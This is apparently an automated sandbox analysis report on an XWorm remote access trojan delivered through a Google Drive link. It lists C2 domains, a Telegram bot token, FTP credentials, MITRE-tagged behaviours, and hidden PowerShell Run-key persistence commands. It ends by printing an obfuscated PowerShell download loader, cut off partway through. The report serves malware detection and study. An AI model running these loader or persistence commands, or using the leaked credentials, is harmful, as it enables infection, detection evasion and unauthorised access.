xworm | hxxps://cas5-0-urlprotect[.]trendmicro[.]com[:]443/wis/clicktime/v1/query?url=https%3a%2f%2fdrive[.]google[.]com%2ffile%2fd%2f1y4twidPt%5fxIGHtWPIS0Y3kuf2C%5faOEMg%2fview%3fusp%3dsharing&umid=44756b35-30d3-448b-a7b0-49fbc9be1930&auth=215f1a6ecbf033888ef4204498c1bcb4ca577ef8-9bec1ee02d92b6e86ba5b11a0b536b0d16e6759e

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fdrive.google.com%2ffile%2fd%2f1y4twidPt%5fxIGHtWPIS0Y3kuf2C%5faOEMg%2fview%3fusp%3dsharing&umid=44756b35-30d3-448b-a7b0-49fbc9be1930&auth=215f1a6ecbf033888ef4204498c1bcb4ca577ef8-9bec1ee02d92b6e86ba5b11a0b536b0d16e6759e

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
mfnEdMDLnE@@1578

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
fYudY1578@@@@@@

Extracted

Family

xworm

Version

5.0

moneyluckwork.ddns.net:7000

moneyluck.duckdns.org:7000

Mutex

HLfH6HTja99GuzBA

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5920-373-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 11 IoCs

flow	pid	Process
123	5388	powershell.exe
126	2952	powershell.exe
127	2952	powershell.exe
129	2952	powershell.exe
131	4056	powershell.exe
132	4056	powershell.exe
133	4056	powershell.exe
135	4056	powershell.exe
137	4056	powershell.exe
140	4056	powershell.exe
141	224	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5828	powershell.exe
8	powershell.exe
1652	powershell.exe
1100	powershell.exe
736	powershell.exe
1176	powershell.exe
2044	powershell.exe
2952	powershell.exe
800	powershell.exe
5388	powershell.exe
4056	powershell.exe
224	powershell.exe
5736	powershell.exe
5884	powershell.exe
5468	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_uxa = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\kfazm.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_chu = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\kfazm.ps1' \";exit"	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
6008	cmd.exe
4908	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
135	pastebin.com
141	pastebin.com
24	drive.google.com
25	drive.google.com
134	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 224 set thread context of 5920	224	powershell.exe	157

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5364	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5364	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5920	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
4848	msedge.exe
4848	msedge.exe
2876	identity_helper.exe
2876	identity_helper.exe
4616	msedge.exe
4616	msedge.exe
800	powershell.exe
800	powershell.exe
800	powershell.exe
5388	powershell.exe
5388	powershell.exe
5388	powershell.exe
5388	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
5472	msedge.exe
5472	msedge.exe
2952	powershell.exe
2952	powershell.exe
5472	msedge.exe
5472	msedge.exe
2952	powershell.exe
2952	powershell.exe
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
8	powershell.exe
8	powershell.exe
5828	powershell.exe
5828	powershell.exe
8	powershell.exe
5828	powershell.exe
4056	powershell.exe
1176	powershell.exe
1176	powershell.exe
1652	powershell.exe
1652	powershell.exe
1176	powershell.exe
1652	powershell.exe
5832	powershell.exe
5832	powershell.exe
5832	powershell.exe
1100	powershell.exe
1100	powershell.exe
1100	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
224	powershell.exe
224	powershell.exe
224	powershell.exe
5736	powershell.exe
5736	powershell.exe
5736	powershell.exe
5884	powershell.exe
5884	powershell.exe
5884	powershell.exe
5920	RegAsm.exe
5920	RegAsm.exe
5468	powershell.exe
5468	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeRestorePrivilege	5584	7zG.exe
Token: 35	5584	7zG.exe
Token: SeSecurityPrivilege	5584	7zG.exe
Token: SeSecurityPrivilege	5584	7zG.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	5388	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	5828	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	5832	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	5736	powershell.exe
Token: SeDebugPrivilege	5884	powershell.exe
Token: SeDebugPrivilege	5920	RegAsm.exe
Token: SeDebugPrivilege	5468	powershell.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
5584	7zG.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5920	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4848 wrote to memory of 2040	4848	msedge.exe	85
PID 4848 wrote to memory of 2040	4848	msedge.exe	85
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 2420	4848	msedge.exe	86
PID 4848 wrote to memory of 3652	4848	msedge.exe	87
PID 4848 wrote to memory of 3652	4848	msedge.exe	87
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88
PID 4848 wrote to memory of 3600	4848	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fdrive.google.com%2ffile%2fd%2f1y4twidPt%5fxIGHtWPIS0Y3kuf2C%5faOEMg%2fview%3fusp%3dsharing&umid=44756b35-30d3-448b-a7b0-49fbc9be1930&auth=215f1a6ecbf033888ef4204498c1bcb4ca577ef8-9bec1ee02d92b6e86ba5b11a0b536b0d16e6759e
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9e6ef46f8,0x7ff9e6ef4708,0x7ff9e6ef4718
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:1076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:2216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4232 /prefetch:1
  2⤵
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2028 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,2135550982127974502,15402492621341655548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4712

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4584

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5236

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BON_DE_REGLEMENT\" -spe -an -ai#7zMap27554:94:7zEvent32358
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5584

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BON_DE_REGLEMENT\ORDRE_VIREMENT.js"
1⤵
- Checks computer location settings
PID:4984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'LAEEAVA' + [char]66 + 'pAGgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQASw' + [char]66 + '' + [char]66 + 'AFQAaQ' + [char]66 + 'oACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'iAHEAcg' + [char]66 + '6AHEAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAbA' + [char]66 + 'rAE0AdA' + [char]66 + '1ACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAbA' + [char]66 + 'rAE0AdA' + [char]66 + '1ACAAKQAgAHsAJA' + [char]66 + 'iAHEAcg' + [char]66 + '6AHEAIAA9ACAAKAAkAGIAcQ' + [char]66 + 'yAHoAcQAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGIAcQ' + [char]66 + 'yAHoAcQAgAD0AIAAoACQAYg' + [char]66 + 'xAHIAeg' + [char]66 + 'xACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + 